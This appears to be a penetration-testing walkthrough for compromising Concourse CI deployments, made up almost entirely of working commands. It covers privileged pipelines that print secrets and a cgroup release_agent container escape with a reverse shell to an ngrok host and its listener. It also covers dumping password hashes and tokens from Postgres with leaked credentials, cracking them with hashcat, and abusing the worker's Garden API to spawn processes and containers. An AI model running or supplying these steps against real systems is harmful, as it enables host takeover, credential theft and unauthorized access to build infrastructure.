jobs:
- name: simple
  plan:
  - task: simple-task
    privileged: true
    config:
      # Tells Concourse which type of worker this task should run on
      platform: linux
      image_resource:
        type: registry-image
        source:
          repository: busybox # images are pulled from docker hub by default
      run:
        path: sh
        args:
        - -cx
        - |
          echo "$SUPER_SECRET"
          sleep 1000
      params:
        SUPER_SECRET: ((super.secret))
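To try the pipeline, deploy it and trigger the job with fly. A minimal sketch, assuming a fly target named `tutorial` and the YAML above saved as `pipeline.yml` (both names are assumptions):

# Sketch: deploy and run the privileged pipeline above
fly -t tutorial set-pipeline -p simple -c pipeline.yml
fly -t tutorial unpause-pipeline -p simple
fly -t tutorial trigger-job -j simple/simple --watch   # streams the build output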
# For more task_config options check https://concourse-ci.org/tasks.html
platform: linux
image_resource:
  type: registry-image
  source:
    repository: ubuntu
run:
  path: sh
  args:
  - -cx
  - |
    env
    sleep 1000
params:
  SUPER_SECRET: ((super.secret))
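A standalone task config like this can also be run as a one-off build, which is a quick way to check whether the credential manager resolves `((super.secret))` into the environment. A sketch, assuming the config is saved as `task.yml` and the same `tutorial` target:

# Sketch: run the task config above as a one-off build
fly -t tutorial execute -c task.yml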
# Mounts the memory cgroup controller and creates a child cgroup
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# it's because your setup doesn't have the memory cgroup controller: try changing memory to rdma to fix it
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

# Enables cgroup notifications on release of the "x" cgroup
echo 1 > /tmp/cgrp/x/notify_on_release

# CHANGE ME
# The host path will look like the following, but you need to change it:
host_path="/mnt/vda1/hostpath-provisioner/default/concourse-work-dir-concourse-release-worker-0/overlays/ae7df0ca-0b38-4c45-73e2-a9388dcb2028/rootfs"
## The initial path "/mnt/vda1" is probably the same, but you can check it using the mount command:
#/dev/vda1 on /scratch type ext4 (rw,relatime)
#/dev/vda1 on /tmp/build/e55deab7 type ext4 (rw,relatime)
#/dev/vda1 on /etc/hosts type ext4 (rw,relatime)
#/dev/vda1 on /etc/resolv.conf type ext4 (rw,relatime)

## The next part, "hostpath-provisioner/default/", appears to be constant

## For the next part, "concourse-work-dir-concourse-release-worker-0", you need to know how it's constructed:
# "concourse-work-dir" is constant
# "concourse-release" is the concourse prefix of the current concourse env (you need to find it from the API)
# "worker-0" is the name of the worker the container is running in (usually that one, or the same with an incremented number)
## The final part "overlays/bbedb419-c4b2-40c9-67db-41977298d4b3/rootfs" is kind of constant
# Running `mount | grep "on / " | grep -Eo "workdir=([^,]+)"` you will see something like:
# workdir=/concourse-work-dir/overlays/work/ae7df0ca-0b38-4c45-73e2-a9388dcb2028
# the UID is the part we are looking for

# Then the host_path is:
#host_path="/mnt/<device>/hostpath-provisioner/default/concourse-work-dir-<concourse_prefix>-worker-<num>/overlays/<UID>/rootfs"
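Putting the pieces together, a short sketch that assembles host_path from the parts described above; the device, Concourse prefix, and worker name are assumptions you must confirm on your target:

# Sketch: assemble host_path (device/prefix/worker values are assumptions)
device="vda1"               # from the `mount` output
prefix="concourse-release"  # Concourse env prefix (find it via the API)
worker="worker-0"           # worker the container is running on
# Extract the overlay UID from the workdir= option of the / mount
workdir=$(mount | grep "on / " | grep -Eo "workdir=([^,]+)" | cut -d= -f2)
uid=$(basename "$workdir")
host_path="/mnt/$device/hostpath-provisioner/default/concourse-work-dir-$prefix-$worker/overlays/$uid/rootfs"
echo "$host_path"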
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent

#====================================
# Reverse shell
echo '#!/bin/bash' > /cmd
echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd
chmod a+x /cmd
#====================================
# Get output
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
#====================================

# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

# Reads the output
cat /output
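Note that both payloads above write to /cmd, so pick one before triggering the release; `cat /output` only applies to the "Get output" variant. For the reverse-shell variant you also need a listener on the attacker side. A sketch, assuming you expose a local port through ngrok as in the example payload (the local port is an assumption; ngrok prints the public 0.tcp.ngrok.io:<port> endpoint to put in /cmd):

# Sketch: attacker-side listener for the reverse shell (local port is an assumption)
ngrok tcp 4444    # note the public tcp://0.tcp.ngrok.io:<port> endpoint it prints
nc -lvnp 4444     # in another terminal, wait for the shell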
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

# Enables cgroup notifications on release of the "x" cgroup
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab | head -n 1`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

#====================================
# Reverse shell
echo '#!/bin/bash' > /cmd
echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd
chmod a+x /cmd
#====================================
# Get output
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
#====================================

# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

# Reads the output
cat /output
env | grep -i postg
CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238
CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_PORT=5432
CONCOURSE_RELEASE_POSTGRESQL_SERVICE_PORT_TCP_POSTGRESQL=5432
CONCOURSE_POSTGRES_USER=concourse
CONCOURSE_POSTGRES_DATABASE=concourse
CONCOURSE_POSTGRES_PASSWORD=concourse
[...]

# Access the postgresql db
psql -h 10.107.191.238 -U concourse -d concourse
select * from password; # Find hashed passwords
select * from access_tokens;
select * from auth_code;
select * from client;
select * from refresh_token;
select * from teams; # Change the permissions of the users in the teams
select * from users;
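The hashed passwords can also be dumped and attacked offline. A sketch, assuming the hashes turn out to be bcrypt (`$2a$`/`$2b$` prefix), which corresponds to hashcat mode 3200; verify the actual hash format first, and the wordlist path is an assumption:

# Sketch: dump and crack the password hashes (check the hash format before picking the mode)
PGPASSWORD=concourse psql -h 10.107.191.238 -U concourse -d concourse \
  -c "copy (select * from password) to stdout" > hashes.txt
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt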
# Get current containers
curl 127.0.0.1:7777/containers
{"Handles":["ac793559-7f53-4efc-6591-0171a0391e53","c6cae8fc-47ed-4eab-6b2e-f3bbe8880690"]}

# Get container info
curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/info
curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties

# Execute a new process inside a container
## In this case "sleep 20000" will be executed in the container with handle ac793559-7f53-4efc-6591-0171a0391e53
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
  --header='Content-Type:application/json' \
  'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'

# OR instead of doing all of that, you could just get into the ns of the process of the privileged container
nsenter --target 76011 --mount --uts --ipc --net --pid -- sh
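The nsenter target PID (76011 in the example) is a process running inside the privileged container, located from the worker host. A sketch, assuming the container is running the `sleep 20000` process started above:

# Sketch: find a PID belonging to the privileged container from the worker host
ps aux | grep "sleep 20000"
# then enter that process's namespaces (replace <pid> with the one you found)
nsenter --target <pid> --mount --uts --ipc --net --pid -- sh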
curl -X POST http://127.0.0.1:7777/containers \
  -H 'Content-Type: application/json' \
  -d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
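The `rootfs` and `bind_mounts` values reference volumes under the worker's work dir; if you already have a foothold on the worker you can enumerate candidate volume handles before crafting the request. A sketch:

# Sketch: list live volume handles usable as rootfs / bind mounts
ls /concourse-work-dir/volumes/live/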
# Wget will be stuck there for as long as the process is running
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
  --header='Content-Type:application/json' \
  'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'